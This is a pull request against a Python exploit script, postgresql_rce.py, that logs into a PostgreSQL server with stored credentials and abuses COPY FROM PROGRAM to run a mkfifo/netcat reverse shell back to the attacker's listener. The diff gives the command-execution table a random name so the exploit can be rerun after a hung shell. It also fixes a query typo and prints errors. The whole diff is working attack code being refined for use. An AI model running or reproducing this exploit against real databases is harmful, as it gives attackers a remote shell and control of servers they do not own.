### PR TITLE
Randomize exec table name

### DIFF
--- a/postgresql_rce.py
+++ b/postgresql_rce.py
@@ -1,6 +1,10 @@
 #!/usr/bin/env python3
 import psycopg2
+import random
+import string
 
+random_suffix = ''.join(random.choices(string.ascii_lowercase, k=3))
+table = f"cmd_exec_{random_suffix}"
 
 RHOST = '192.168.56.47'
 RPORT = 5437
@@ -15,13 +19,13 @@ with psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASSWD) as con
         print("[!] Connected to the PostgreSQL database")
         rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f"
         print(f"[*] Executing the payload. Please check if you got a reverse shell!\n")
-        cur.execute('DROP TABLE IF EXISTS cmd_exec')
-        cur.execute('CREATE TABLE cmd_exec(cmd_output text)')
-        cur.execute('COPY cmd_exec FROM PROGRAM \'' + rev_shell  + '\'')
-        cur.execute('SELEC * from cmd_exec')
+        cur.execute(f'DROP TABLE IF EXISTS {table}')
+        cur.execute(f'CREATE TABLE {table}(cmd_output text)')
+        cur.execute(f'COPY {table} FROM PROGRAM \'{rev_shell}\'')
+        cur.execute(f'SELECT * from {table}')
         v = cur.fetchone()
-        #print(v)
+        # print(v)
         cur.close()
 
-    except:
-        print(f"[!] Something went wrong")
+    except Exception as e:
+        print(f"[!] Something went wrong: {e}")


### PR DESCRIPTION
If the reverse shell hangs and you have to CTRL+C to exit, when trying to create a new one it doesn't work (at least in my case). Using a new exec table name fixed this issue